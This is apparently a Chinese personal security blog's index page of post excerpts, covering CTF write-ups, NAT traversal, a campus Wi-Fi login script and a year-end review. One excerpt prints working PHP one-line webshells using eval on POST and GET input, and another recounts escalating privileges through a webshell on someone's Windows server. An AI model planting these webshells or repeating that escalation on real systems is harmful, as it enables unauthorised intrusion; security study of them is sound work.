2023.1.6更新:原来域名bbs.xiao-xin6.cn已完成过渡工作现已设置301跳转至blog.xioxix.com 本站已从原先的域名(bbs.xiao-xin6.cn)切换到新的域名(blog.xioxix…
NAT1(Full Cone)利用natter实现内网穿透并在公网上访问
需要用到的工具 Python https://www.python.org/downloads/ Natter.py https://github.com/MikeWang000000/Natter/tree/v0.9 …
![[年度总结]2022个人年度总结](https://oss.xioxix.com/bbs/2022/12/20221231080905393.png)
[年度总结]2022个人年度总结
今天是 2022 最后一天,憋了半天的总结 今年一共发出了7篇文章,目前来说算是建站以来发布的文章最多的一年。 今年添加了 8 个新友链,现在我有 11 个友链了。(各位大佬新年快乐呀) 主页换了一个新的,更符合我的审美…
![[CTF]WEB Robots.txt文件](https://oss.xioxix.com/bbs/2022/08/20220813090146613.webp)
[CTF]WEB Robots.txt文件
robots.txt是一个协议,而不是一个命令。robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。robots.txt文件告诉蜘蛛程序在服务器上什么文件是可以被查看的。在CTF中常用于提示解题思路 &nb…
[CTF]WEB文件包含漏洞
File Inclusion,意思是文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),req…
[CTF]MISC寻找宝藏
开新坑的第一篇文章,这是一次线上CTF中的真题,记录一下解题过程 CTF 是 Capture The Flag 的简称,中文咱们叫夺旗赛,其本意是西方的一种传统运动。在比赛上两军会互相争夺旗帜,当有一方的旗帜已被敌军夺取…
[渗透测试]记录一次Windows宝塔提权过程(php)
昨晚上网冲浪的时候有一个网友丢了个shell给我,于是便有了下面的内容。 先使用蚁剑连接上该shell 到了这里可以发现,是一台Windows的服务器,而且使用了宝塔。 接下来开始寻找提权方法 游历目录的时候发现宝塔官方…
![GiWiFi模拟网页认证[python]](/wp-content/themes/kratos-pjax-master/static/images/thumb/thumb_18.jpg)
GiWiFi模拟网页认证[python]
由于学校采用Giwifi作为校园网接入点,每天凌晨都需要重新认证,于是便有了这个脚本 不需要多余的任何操作,只需要将代码里的 ‘name’: ‘your iphone’, ‘password’: ‘password’, …
常见PHP一句话木马
1、eval.php <?php @eval($_POST['cmd'])?> <?php @eval($_GET['cmd'])?> 2、assert.php <?php assert($…